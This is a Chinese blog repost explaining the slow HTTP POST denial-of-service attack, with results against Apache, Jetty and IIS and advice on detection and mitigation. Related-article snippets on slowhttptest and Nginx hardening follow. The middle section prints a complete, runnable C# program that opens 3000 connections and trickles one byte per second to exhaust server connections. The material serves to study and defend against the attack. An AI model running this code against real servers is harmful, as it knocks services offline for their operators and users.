HTTP POST慢速DOS攻击

最新推荐文章于 2025-11-13 09:18:55 发布
转载 最新推荐文章于 2025-11-13 09:18:55 发布 · 5k 阅读 · 0

1. 关于HTTP POST慢速DOS攻击


HTTP Post慢速DOS攻击第一次在技术社区被正式披露是今年的OWASP大会上,由Wong Onn Chee 和 Tom Brennan共同演示了使用这一技术攻击的威力。他们的slides在这里:

http://www.darkreading.com/galleries/security/application-security/228400167/slide-show-ddos-with-the-slow-http-post-attack.html

这个攻击的基本原理如下:

针对任意HTTP Server,建立一个连接,指定一个比较大的content-length,然后以很低的速度发包,比如10-100s发一个字节,hold住这个连接不断开。如果客户端持续建立这样的连接,那么服务器上可用的连接将很快被占满,从而导致DOS.

这一攻击引起我注意的原因有这几点:

1. 它可以针对任意Web服务。HTTP协议在接收到request之前是无法对请求内容作校验的,所以即使你的Web应用没有可用form表单,这个攻击一样有效。

2. 廉价。在客户端以单线程方式建立较大数量的无用连接,并保持持续发包的代价非常低廉。实际试验中一台普通PC可以建立的Socket连接在3000个以上。这对一台普通的web server,将是致命的打击。更不用说结合肉鸡群做分布式DOS了。

2. 攻击示范

 1 using  System;
  2 using  System.Collections.Generic;
  3 using  System.Text;
  4 using  System.Net.Sockets;
  5 using  System.Threading;
  6
 7 namespace  HTTPPostDoS
  8 {
 9    class TestDemo
10    {
11        static void Main(string[] args)
12        {
13            string host = "target";
14            int port = 8080;
15            int max_number_of_connection = 3000;
16            List<TcpClient> clients = new List<TcpClient>();
17
18            for (int i = 0; i < max_number_of_connection; i++)
19            {
20                TcpClient client = new TcpClient();
21                clients.Add(client);
22                client.Connect(host, port);
23
24                if (client.Connected)
25                {
26                    string header = "POST /a HTTP/1.1\r\n" +
27                                    "HOST: " + host + "\r\n" +
28                                    "Connection: keep-alive\r\n" +
29                                    "Keep-Alive: 900\r\n" +
30                                    "Content-Length: 100000000\r\n" +
31                                    "Content_Type: application/x-www-form-urlencoded\r\n" +
32                                    "Accept: *.*\r\n";
33                    int sent = client.Client.Send(System.Text.Encoding.Default.GetBytes(header));
34                    if (sent <= 0)
35                    {
36                        Console.WriteLine("Error while connecting to server");
37                    }
38                    else
39                    {
40                        Console.WriteLine("Connected");
41                    }
42                }
43            }
44
45            while (true)
46            {
47                int i = 0;
48                foreach (TcpClient client in clients)
49                {
50                    i++;
51                    client.Client.Send(System.Text.Encoding.Default.GetBytes("a"));
52                    Console.WriteLine("Client " + i + " just sent a byte.");
53                }
54                Thread.Sleep(1000);
55            }
56        }
57    }
58}

这段代码向目标服务器的示例Web Server发起攻击,每秒钟向服务器post一个字节以保证连接不会过期。

这个攻击对Apache的效果十分明显,Apache的maxClients几乎在瞬间被hold住,浏览器在攻击进行期间无法访问测试页面。

但是针对IIS的攻击被证明没有效果,同时我还测试了公司使用最多的Jetty,有了更多有意思的发现。

3. Jetty Server 在NIO和BIO模式下对此攻击的不同反应

在针对Jetty做测试时,我发现针对不同的Jetty Connector配置,攻击的效果有天壤之别。

我们知道Jetty在配置Connector时,可以有NIO和BIO两种模式供选择。当使用BIO模式时,Jetty的max thread被瞬间耗尽,服务停止。但是在使用NIO模式时,即使客户端的恶意socket连接数已经达到3000个,但是服务依然没有受到任何影响。这个应该很好理解,由于这两种模式下的Connector直接影响到服务端处理Socket的模型。IIS的情况我不是很清楚,但是猜测MS在实现时采用了NIO Socket模型。

详细的配置情况,请参见Jetty的官方文档

其它的Web Server,我没有做进一步测试。如有兴趣请自行验证。

4. 检测与防范

目前针对Apache服务器,官方尚没有解决方案出台。建议:

1. 检查日志,查找类似的错误报警:

[error] server reached MaxClients setting, consider raising the MaxClients setting

看看有没有被这种攻击盯上。

2. 调整防火墙设置。有条件的,在IPS上做一下规则设置。

注意这些都还只是暂时措施,因为这种攻击的变化可能很多,事实上使用HTTP GET也可以达到一样的效果。要知道GET也是可以传输数据的。

针对Jetty服务器,强烈建议使用NIO非阻塞模式,对服务器可以起到很好的保护作用。

本文转载自 http://www.blogjava.net/fanyingjie/archive/2013/08/01/402234.html

网络安全实入门| 剖析HTTP慢速攻击(Slowloris)与Nginx防护配置
Memory_mumu的博客
02-24 1263
通过调整TCP窗口大小(如设置为512字节),强制服务器将大文件拆分为多个小包发送,客户端以极低速率接收,导致响应数据长期滞留服务器内存。:利用HTTP协议对请求完整性的依赖,例如不发送完整的请求头(如缺少\r\n\r\n。监控连接数和请求速率,自动封禁异常IP(如连续发送未完成头部的IP)。(如100MB),随后以极慢速度发送数据体(如每10秒发送1字节)。:设置接收完整HTTP头部的超时时间(如10秒),超时则断开连接。:限制请求体的传输时间(如20秒),防止Slow Body攻击
Slowhttptest攻击原理
root143的博客
03-16 5454
Slowhttptest其实是一个DoS压力测试工具,它集成有三种慢速攻击模式(slowloris、slow http post、slow read attack),并且能导出日志报告,节约了部分写文档的时间,是一个特别好用且强大的工具,下面笔者将逐个分析它主要的攻击模式及防御方法。一、Slowhttptest安装Mac安装命令:brew update &amp;&amp; brew instal...
软件安全测试·DoS·HTTP慢速攻击
06-22
一、攻击原理 2 二、测试用例设计 3 三、测试用例执行结果 4 附:slowhttptest工具使用介绍 5 1. 官方示例 5 2. 结果查看 5
慢速 HTTP 拒绝服务攻击防御Nginx配置手册(肉鸡攻击
最新发布
L162476的博客
11-13 1058
摘要:本文详细解析了慢速HTTP拒绝服务攻击(SlowHTTPDoS)的原理与三种类型(Slowheaders、Slowbody、Slowread),并提出基于Nginx的防御策略。核心防御措施包括设置超时控制(client_header_timeout/client_body_timeout等参数)、连接与速率限制(limit_conn/limit_req模块)、请求过滤等方法。文章提供了具体配置示例,指导如何优化Nginx参数以快速释放无效连接、限制单IP资源占用,并建议结合日志监控、防火墙等多层防御手
转帖:HTTP POST慢速DOS攻击初探
茂森的专栏
03-07 7056
HTTP POST慢速DOS攻击初探December 28th, 2010 Posted in 应用安全及黑客攻击 , 软件架构与设计1. 关于HTTP POST慢速DOS攻击<br />HTTP Post慢速DOS攻击第一次在技术社区被正式披露是今年的OWASP大会上,由Wong Onn Chee 和 Tom Brennan共同演示了使用这一技术攻击的威力。他们的slides在这里:<br />http://www.darkreading.com/galleries/security/applicat
http get post 慢速攻击
热门推荐
hjm4702192的专栏
08-14 1万+
提起攻击,第一反应就是海量的流量、海量的报文。但有一种攻击却反其道而行之,以著称,以至于有些攻击目标被打死了都不知道是怎么死的,这就是慢速连接攻击。slowhttptest是一款对服务器进行攻击的测试软件,包含了几种攻击方式,像Slowloris、SlowHTTP POST、Slow Read attack等。总而言之,该工具的原理就是设法让服务器等待,当服务器在保持连接等待时,就消耗了资源。
19、网络安全:Java卡防护与慢速DoS攻击解析
sunny的博客
06-27 98
本文探讨了网络安全领域的两个重要主题:Java卡防护和慢速DoS攻击。在Java卡防护部分,介绍了通过二进制代码加扰来抵御基于链接器漏洞的逻辑攻击。在慢速DoS攻击解析部分,详细分析了其分类、攻击策略及隐蔽性特点,包括待处理请求DoS、长响应DoS、多层DoS,以及实际攻击与元攻击的可行性分类。文章旨在帮助开发人员和网络管理员更好地理解威胁,并设计有效的防御策略。
浅谈“慢速HTTP攻击Slow HTTP Attack”
→_→
07-31 7269
一:漏洞名称: Slow Http attack、慢速攻击 描述: HTTP慢速攻击也叫slow http attack,是一种DoS攻击的方式。由于HTTP请求底层使用TCP网络连接进行会话,因此如果中间件对会话超时时间设置不合理,并且HTTP在发送请求的时候采用慢速HTTP请求,就会导致占用一个HTTP连接会话。如果发送大量慢速HTTP包就会导致拒绝服务攻击DoS。 Slow Attack 大致可分为以下几种: Slow headers(也称slowloris):每个 HTT
Torshammer: 一款开源慢速DOS攻击测试工具
资源摘要信息:"Torshammer是一个开源的、使用Python编写的拒绝服务(DoS)测试工具,专为执行缓POST攻击而设计。该工具的独特之处在于它能够通过Tor网络匿名运行,增加攻击的隐蔽性。Torshammer对于网络安全专家来...
http慢速连接攻击
banxia_的博客
05-24 5496
http链接的攻击方法 首先我们来下载slowhttptest . slowhttptest是一款对服务器进行攻击的测试软件,所谓的攻击就是相对于cc或者ddos的快而言的,并不是只有量大速度快才能把服务器搞挂,使用攻击有时候也能到达同一效果。slowhttptest包含了之前几种攻击攻击方式,包括slowloris, Slow HTTP POST, Slow Read
http攻击
u012980075的博客
08-08 1067
慢速攻击可以让没有防护的服务器或者网络设备瘫痪能说不算漏洞? 我就总结一下自己是怎么复现的吧 首先可以使用扫描器来扫出这个漏洞 但是你写报告里面别人肯定是不能信服的啊我们就来用工具来验证一下吧 第一种方法就是使用kali自带的slowhttptest试试 安装我就不多说了网上都有 我们来看看怎么使用 在终端使用命令 slowhttptest -c 1000 -H ...
HTTP慢速攻击详解
永远是少年
01-04 5594
今天继续给大家介绍渗透测试相关知识,本文主要内容是HTTP慢速攻击详解。 一、HTTP慢速攻击简介 二、HTTP慢速攻击常见手段 三、Nginx服务器针对HTTP慢速攻击配置
HTTP攻击(Slow HTTP Attack)
qq_44005305的博客
01-10 6140
HTTP拒绝服务攻击是一种专门针对于Web的应用层拒绝服务攻击攻击者操纵网络上的肉鸡,对目标Web服务器进行海量HTTP请求攻击,直到服务器带宽被打满,造成了拒绝服务。瘫痪目标服务器。
Dos慢速攻击
汪敏的博客
04-25 491
如果测试结束后connected数量较多,closed数量很少或0,说明之前建立的慢速攻击测试连接没有关闭,那么就会存在漏洞。测试结果为“Exit status:== No open connections left==",代表无此漏洞。
SlowHTTPTest-慢速DoS攻击
anlalu233的博客
03-27 748
https://www.cnblogs.com/daoyi/p/SlowHTTPTestman-suDoS-gong-ji.html
HTTP慢速攻击原理及解决办法
weixin_43841461的博客
11-01 3124
针对Nginx、Tomcat和IIS等常用的Web服务器,可以通过设置连接超时时间、限制每个IP的连接数和启用缓冲区限制等方法来有效防御此类攻击HTTP慢速攻击(Slow HTTP Attack)是一种拒绝服务攻击DoS),攻击者通过故意缓地发送HTTP请求来耗尽服务器资源,导致合法用户无法访问服务。本文将详细介绍HTTP慢速攻击的原理,并针对Nginx、Tomcat和IIS等常见的Web服务器提供具体的防御配置方法。这些指令设置了客户端发送请求体、请求头和服务器发送响应的最大等待时间。
SlowHTTPTest ***测试
无锋剑
01-19 397
   SlowHTTPTest是一个可配置的工具,模拟了一些应用程序层拒绝服务***。它可以在大多数Linux平台,OSX和Cygwin——一个类unix环境和命令行接口为窗口。        Slowloris和缓HTTP POST DoS***依赖于HTTP协议的事实,通过设计,将每次发送数据包的一部分。如果一个HTTP请求是不完整的,或者如果转移率非常低,服务器保持其资源忙等待其余的...
什么是HTTP慢速攻击?看不见的“温水煮青蛙”,如何瘫痪你的服务器?
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
06-21 1190
超时时间是生命线:务必低于30秒;监控连接状态:突发长期空闲连接即告警;混合防护:配置调优+流量清洗+架构优化。🔑核心认知:慢速攻击不是“洪水猛兽”,而是“滴水穿石”。防御的核心在于主动切断异常连接,而非被动增加资源!参考资料CC攻击的变异品种——慢速攻击.pdfp=6277 (访问密码: 6277)免责声明:本文技术方案需根据业务场景测试调整,盲目配置可能导致服务中断。本文仅供学习交流,使用工具时需遵守相关法律法规,且勿用于非法用途。关注我,带你用“人话”读懂技术硬核!🔥。
http慢速攻击原理和防护方法
focus on security
12-10 6029
http慢速攻击是利用Http现有合法机制,在建立了与Http服务器的连接后,尽量长时间保持该连接,不释放,达到对http服务器的攻击。常见攻击有两种: slow post攻击者通过发送post报文向服务器请求提交数据,将总报文长度设置为一个很大是数值,但是在随后的数据发送中,每次只发送很小的白问,这样导致服务器端一直等待攻击者发送数据。 slow headers: 攻击者通过get或post向服务器建立连接,但是http头字段不发送结束符,之后发送其他字段进行保活。服务器会一直等待头信息中结束符而导致
HTTP慢速攻击DoS防御与slowhttptest工具实践
文章提到了Slowloris和SlowHTTPPOST两种DoS攻击方式,并推荐了slowhttptest工具进行测试。 一、攻击原理 HTTP慢速攻击,如Slowloris和SlowHTTPPOST,基于HTTP协议的机制,即服务器必须等待接收完整请求才能开始处理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值